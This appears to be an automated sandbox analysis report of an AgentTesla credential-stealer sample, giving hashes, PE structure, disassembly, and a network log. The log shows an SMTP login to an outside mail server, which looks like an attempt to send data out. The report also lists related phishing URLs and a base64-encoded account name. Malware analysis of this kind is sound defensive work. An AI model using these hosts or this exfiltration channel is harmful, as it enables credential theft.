                                                              https://se-sec-cru-sec-rity.linkpc.net/Get hashmaliciousHTMLPhisherBrowse
                                                              • 96.125.163.17
                                                              https://seeeee-rcurr--cu---ty.linkpc.net/Get hashmaliciousHTMLPhisherBrowse
                                                              • 96.125.163.17
                                                              phish_alert_sp2_2.0.0.0 (7).emlGet hashmaliciousHTMLPhisherBrowse
                                                              • 192.185.189.216
                                                              invite.htaGet hashmaliciousUnknownBrowse
                                                              • 162.241.169.194
                                                              https://www.followmyhealth.com/PatientAccess?Organization=//V7mYkE8.worleyenterprise.com%2Fam9uYXRoYW4uZ3JlZWxleUB5b2dpcHJvZHVjdHMuY29t??&Invite=9MnjZPjvSBkWo1AJg0Su4CMECM3Gy2EqMLythemnkfrUifOZKY6iVLesbc/wYCFYSg4z04xrxoVh+YBkzkGlbNg6ZfZpnz2Fxa8Lq5YeHuI=Get hashmaliciousHTMLPhisherBrowse
                                                              • 69.49.228.234

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.34331486778365
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.921452103105054
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                                                              File size:727'040 bytes
                                                              MD5:7806be4f71ce1b0fc27c40974ecb5041
                                                              SHA1:bb38809901742d73eccbce01f4576aa6301d35fb
                                                              SHA256:81ace4c307c53dcb5aa5e1d7a971d373a734c747408be3a9158bb00b5b11f8a2
                                                              SHA512:f009fbb754c863d810099558671e10a665b36dfa655db06860d6de1b5469c125a102a776c99dbc03ac394ef95e5f5bd845a39fd86545ef473008096dd4365bb9
                                                              SSDEEP:12288:J4CMwhctpl1p1TvwjnPWr8Av6cRnjW3YqHaB+QczbA:clXBvwjnPWPv6UqHaoQ
                                                              TLSH:58F4120033AC2A73EABF9AF64829006143B2F57B3035D6EB1CC265DE59E6F045B65B17
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..x............... ........@.. .......................`............@................................

                                                              File Icon

                                                              Icon Hash:8b193a9ce163268d

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4a94a2
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6601058C [Mon Mar 25 05:03:08 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              xor al, 35h
                                                              xor eax, 43465138h
                                                              push eax
                                                              xor eax, 38453452h
                                                              xor dl, byte ptr [ecx+eax*2+5Ah]
                                                              push esi
                                                              dec eax
                                                              dec eax
                                                              inc ebx
                                                              inc esp
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa94500x4f.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x8f24.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xa70ac0x54.text
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xa74c00xa7800d9c562796f7012e2116cb9991887920aFalse0.938603369869403data7.937152054368676IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xaa0000x8f240x9000bfce3d1fe259f97a34e6eb54596ba452False0.9531521267361112data7.928785045289302IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xb40000xc0x800d1d0074212a6325f142002586a15e368False0.01611328125data0.03037337037012526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0xaa1000x899dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9775185216724858
                                                              RT_GROUP_ICON0xb2ab00x14data1.05
                                                              RT_VERSION0xb2ad40x250data0.4814189189189189
                                                              RT_MANIFEST0xb2d340x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 25, 2024 08:28:54.524694920 CET49731587192.168.2.450.87.139.143
                                                              Mar 25, 2024 08:28:54.704447031 CET5874973150.87.139.143192.168.2.4
                                                              Mar 25, 2024 08:28:54.704544067 CET49731587192.168.2.450.87.139.143
                                                              Mar 25, 2024 08:28:55.247286081 CET5874973150.87.139.143192.168.2.4
                                                              Mar 25, 2024 08:28:55.249224901 CET49731587192.168.2.450.87.139.143
                                                              Mar 25, 2024 08:28:55.429382086 CET5874973150.87.139.143192.168.2.4
                                                              Mar 25, 2024 08:28:55.430327892 CET49731587192.168.2.450.87.139.143
                                                              Mar 25, 2024 08:28:55.610626936 CET5874973150.87.139.143192.168.2.4
                                                              Mar 25, 2024 08:28:55.610951900 CET49731587192.168.2.450.87.139.143
                                                              Mar 25, 2024 08:28:55.832616091 CET5874973150.87.139.143192.168.2.4
                                                              Mar 25, 2024 08:28:57.438328981 CET5874973150.87.139.143192.168.2.4
                                                              Mar 25, 2024 08:28:57.438661098 CET49731587192.168.2.450.87.139.143
                                                              Mar 25, 2024 08:28:57.618351936 CET5874973150.87.139.143192.168.2.4
                                                              Mar 25, 2024 08:28:57.618724108 CET5874973150.87.139.143192.168.2.4
                                                              Mar 25, 2024 08:28:57.622991085 CET5874973150.87.139.143192.168.2.4
                                                              Mar 25, 2024 08:28:57.623058081 CET49731587192.168.2.450.87.139.143
                                                              Mar 25, 2024 08:28:57.624447107 CET49731587192.168.2.450.87.139.143
                                                              Mar 25, 2024 08:28:57.805243969 CET5874973150.87.139.143192.168.2.4

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 25, 2024 08:28:54.276191950 CET5685453192.168.2.41.1.1.1
                                                              Mar 25, 2024 08:28:54.518208981 CET53568541.1.1.1192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Mar 25, 2024 08:28:54.276191950 CET192.168.2.41.1.1.10x4c13Standard query (0)mail.elec-qatar.comA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Mar 25, 2024 08:28:54.518208981 CET1.1.1.1192.168.2.40x4c13No error (0)mail.elec-qatar.com50.87.139.143A (IP address)IN (0x0001)false

                                                              SMTP Packets

                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                              Mar 25, 2024 08:28:55.247286081 CET5874973150.87.139.143192.168.2.4220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Mon, 25 Mar 2024 01:28:55 -0600
                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                              220 and/or bulk e-mail.
                                                              Mar 25, 2024 08:28:55.249224901 CET49731587192.168.2.450.87.139.143EHLO 849224
                                                              Mar 25, 2024 08:28:55.429382086 CET5874973150.87.139.143192.168.2.4250-box2248.bluehost.com Hello 849224 [102.165.48.43]
                                                              250-SIZE 52428800
                                                              250-8BITMIME
                                                              250-PIPELINING
                                                              250-PIPECONNECT
                                                              250-AUTH PLAIN LOGIN
                                                              250-STARTTLS
                                                              250 HELP
                                                              Mar 25, 2024 08:28:55.430327892 CET49731587192.168.2.450.87.139.143AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
                                                              Mar 25, 2024 08:28:55.610626936 CET5874973150.87.139.143192.168.2.4334 UGFzc3dvcmQ6
                                                              Mar 25, 2024 08:28:57.438328981 CET5874973150.87.139.143192.168.2.4535 Incorrect authentication data
                                                              Mar 25, 2024 08:28:57.438661098 CET49731587192.168.2.450.87.139.143MAIL FROM:<mohammed.abrar@elec-qatar.com>
                                                              Mar 25, 2024 08:28:57.618724108 CET5874973150.87.139.143192.168.2.4550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:04:28:50
                                                              Start date:25/03/2024
                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe"
                                                              Imagebase:0x7ff7699e0000
                                                              File size:727'040 bytes
                                                              MD5 hash:7806BE4F71CE1B0FC27C40974ECB5041
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1638793445.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1638793445.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:04:28:52
                                                              Start date:25/03/2024
                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe"
                                                              Imagebase:0xd80000
                                                              File size:727'040 bytes
                                                              MD5 hash:7806BE4F71CE1B0FC27C40974ECB5041
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2877478732.000000000311E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2875221020.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2875221020.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2877478732.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2877478732.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:9.5%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:100
                                                                Total number of Limit Nodes:6
                                                                execution_graph 27745 288b0d8 27746 288b0e7 27745->27746 27749 288b1bf 27745->27749 27757 288b1d0 27745->27757 27750 288b1e1 27749->27750 27751 288b204 27749->27751 27750->27751 27765 288b458 27750->27765 27769 288b468 27750->27769 27751->27746 27752 288b1fc 27752->27751 27753 288b408 GetModuleHandleW 27752->27753 27754 288b435 27753->27754 27754->27746 27758 288b1e1 27757->27758 27759 288b204 27757->27759 27758->27759 27763 288b458 LoadLibraryExW 27758->27763 27764 288b468 LoadLibraryExW 27758->27764 27759->27746 27760 288b1fc 27760->27759 27761 288b408 GetModuleHandleW 27760->27761 27762 288b435 27761->27762 27762->27746 27763->27760 27764->27760 27766 288b47c 27765->27766 27767 288b4a1 27766->27767 27773 288aee8 27766->27773 27767->27752 27770 288b47c 27769->27770 27771 288b4a1 27770->27771 27772 288aee8 LoadLibraryExW 27770->27772 27771->27752 27772->27771 27774 288b648 LoadLibraryExW 27773->27774 27776 288b6c1 27774->27776 27776->27767 27777 2884668 27778 2884672 27777->27778 27780 2884758 27777->27780 27781 288477d 27780->27781 27785 2884868 27781->27785 27789 2884859 27781->27789 27786 288488f 27785->27786 27788 288496c 27786->27788 27793 28844e0 27786->27793 27791 288488f 27789->27791 27790 288496c 27791->27790 27792 28844e0 CreateActCtxA 27791->27792 27792->27790 27794 28858f8 CreateActCtxA 27793->27794 27796 28859bb 27794->27796 27797 288d460 27798 288d4a6 27797->27798 27802 288d62f 27798->27802 27805 288d640 27798->27805 27799 288d593 27808 288d238 27802->27808 27806 288d66e 27805->27806 27807 288d238 DuplicateHandle 27805->27807 27806->27799 27807->27806 27809 288d6a8 DuplicateHandle 27808->27809 27810 288d66e 27809->27810 27810->27799 27811 29014e8 27812 2901673 27811->27812 27813 290150e 27811->27813 27813->27812 27816 2901763 PostMessageW 27813->27816 27818 2901768 PostMessageW 27813->27818 27817 29017d4 27816->27817 27817->27813 27819 29017d4 27818->27819 27819->27813 27820 e0d01c 27821 e0d034 27820->27821 27822 e0d08e 27821->27822 27825 4f9115c 27821->27825 27834 4f92c09 27821->27834 27826 4f91167 27825->27826 27827 4f92c79 27826->27827 27829 4f92c69 27826->27829 27859 4f91284 27827->27859 27843 4f92e6c 27829->27843 27849 4f92d90 27829->27849 27854 4f92da0 27829->27854 27830 4f92c77 27837 4f92c45 27834->27837 27835 4f92c79 27836 4f91284 CallWindowProcW 27835->27836 27839 4f92c77 27836->27839 27837->27835 27838 4f92c69 27837->27838 27840 4f92e6c CallWindowProcW 27838->27840 27841 4f92da0 CallWindowProcW 27838->27841 27842 4f92d90 CallWindowProcW 27838->27842 27840->27839 27841->27839 27842->27839 27844 4f92e2a 27843->27844 27845 4f92e7a 27843->27845 27863 4f92e58 27844->27863 27866 4f92e47 27844->27866 27846 4f92e40 27846->27830 27850 4f92db4 27849->27850 27852 4f92e58 CallWindowProcW 27850->27852 27853 4f92e47 CallWindowProcW 27850->27853 27851 4f92e40 27851->27830 27852->27851 27853->27851 27855 4f92db4 27854->27855 27857 4f92e58 CallWindowProcW 27855->27857 27858 4f92e47 CallWindowProcW 27855->27858 27856 4f92e40 27856->27830 27857->27856 27858->27856 27860 4f9128f 27859->27860 27861 4f9435a CallWindowProcW 27860->27861 27862 4f94309 27860->27862 27861->27862 27862->27830 27864 4f92e69 27863->27864 27869 4f942a0 27863->27869 27864->27846 27867 4f92e69 27866->27867 27868 4f942a0 CallWindowProcW 27866->27868 27867->27846 27868->27867 27870 4f91284 CallWindowProcW 27869->27870 27871 4f942aa 27870->27871 27871->27864

                                                                Executed Functions

                                                                Function 04F96C10 Relevance: 31.7, Strings: 23, Instructions: 2915COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 294 4f96c10-4f96c32 296 4f96c34-4f96c56 294->296 297 4f96c57-4f96f5b call 4f969c0 * 6 call 4f969d0 * 2 call 4f969c0 * 4 call 4f969d0 call 4f969c0 * 2 294->297 370 4f96f61-4f96f67 297->370 371 4f96fe0-4f972aa call 4f969c0 * 2 call 4f969d0 call 4f969c0 * 4 call 4f969e0 call 4f969f0 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 297->371 372 4f96f6a-4f96f82 370->372 451 4f972ac-4f972b2 371->451 452 4f972c2-4f972d4 371->452 374 4f96f88-4f96fa4 372->374 375 4f99c7e-4f99ca6 call 2887230 372->375 374->375 377 4f96faa-4f96fde 374->377 380 4f99cab-4f99d6b call 4f96b50 call 4f96b60 375->380 377->371 377->372 453 4f972b4 451->453 454 4f972b6-4f972b8 451->454 452->375 456 4f972da-4f972fa 452->456 453->452 454->452 456->375 458 4f97300-4f97315 456->458 458->375 460 4f9731b-4f97342 458->460 463 4f97349-4f99c7d call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a50 call 4f96a60 call 4f96a70 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a50 call 4f96a60 call 4f96a70 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a50 call 4f96a60 call 4f96a70 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a50 call 4f96a60 call 4f96a70 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a00 call 4f96a10 call 4f96a20 call 4f96a30 call 4f96a40 call 4f96a80 call 4f96a90 call 4f96aa0 call 4f96ab0 call 4f96ac0 call 4f96ad0 call 4f96ae0 call 4f96af0 * 23 call 4f96b00 call 4f96b10 call 4f96b20 call 4f96b30 call 4f96a20 call 4f96b40 460->463
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1640164622.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4f90000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: =$E$K$K$K$K$Q$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w
                                                                • API String ID: 0-1056130950
                                                                • Opcode ID: 5998ba7ee47e84d521fd22211ae8eef6be27f040897598a608fe30ab6c024213
                                                                • Instruction ID: a292ccaa7be21542d00f83c906ce1a61621c70bf39a7dedb62686575e5ccbbe6
                                                                • Opcode Fuzzy Hash: 5998ba7ee47e84d521fd22211ae8eef6be27f040897598a608fe30ab6c024213
                                                                • Instruction Fuzzy Hash: B2633930A10719CFEB14DF28C894B99B7B2FF89304F1186A9D909AB355DB70AE85CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02900640 Relevance: .2, Instructions: 207COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1638026573.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 83e2251336898d723d95f42fe11696441011f91e595833325ad300f6fb8288ef
                                                                • Instruction ID: 796eeabfacbc333db6d7de145e4412e08a5d8f1b4e128e7b52fd689cb62b6b89
                                                                • Opcode Fuzzy Hash: 83e2251336898d723d95f42fe11696441011f91e595833325ad300f6fb8288ef
                                                                • Instruction Fuzzy Hash: 8B91F271D45229CFDB68CF66CC847E9BBB6BF89300F1085AAD40DA6291EB715AC5CF40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288B1D0 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1103 288b1d0-288b1df 1104 288b20b-288b20f 1103->1104 1105 288b1e1-288b1ee call 288ae84 1103->1105 1107 288b211-288b21b 1104->1107 1108 288b223-288b264 1104->1108 1111 288b1f0 1105->1111 1112 288b204 1105->1112 1107->1108 1114 288b271-288b27f 1108->1114 1115 288b266-288b26e 1108->1115 1160 288b1f6 call 288b458 1111->1160 1161 288b1f6 call 288b468 1111->1161 1112->1104 1116 288b281-288b286 1114->1116 1117 288b2a3-288b2a5 1114->1117 1115->1114 1119 288b288-288b28f call 288ae90 1116->1119 1120 288b291 1116->1120 1121 288b2a8-288b2af 1117->1121 1118 288b1fc-288b1fe 1118->1112 1122 288b340-288b400 1118->1122 1124 288b293-288b2a1 1119->1124 1120->1124 1125 288b2bc-288b2c3 1121->1125 1126 288b2b1-288b2b9 1121->1126 1153 288b408-288b433 GetModuleHandleW 1122->1153 1154 288b402-288b405 1122->1154 1124->1121 1129 288b2d0-288b2d9 call 288aea0 1125->1129 1130 288b2c5-288b2cd 1125->1130 1126->1125 1134 288b2db-288b2e3 1129->1134 1135 288b2e6-288b2eb 1129->1135 1130->1129 1134->1135 1136 288b309-288b30d 1135->1136 1137 288b2ed-288b2f4 1135->1137 1158 288b310 call 288b768 1136->1158 1159 288b310 call 288b740 1136->1159 1137->1136 1139 288b2f6-288b306 call 288aeb0 call 288aec0 1137->1139 1139->1136 1142 288b313-288b316 1144 288b318-288b336 1142->1144 1145 288b339-288b33f 1142->1145 1144->1145 1155 288b43c-288b450 1153->1155 1156 288b435-288b43b 1153->1156 1154->1153 1156->1155 1158->1142 1159->1142 1160->1118 1161->1118
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0288B426
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1637888828.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2880000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 4878ad03a8b62a9cdd596c374c3c3d12e5e06796720a5a6c02f4c5ca0b7c2a67
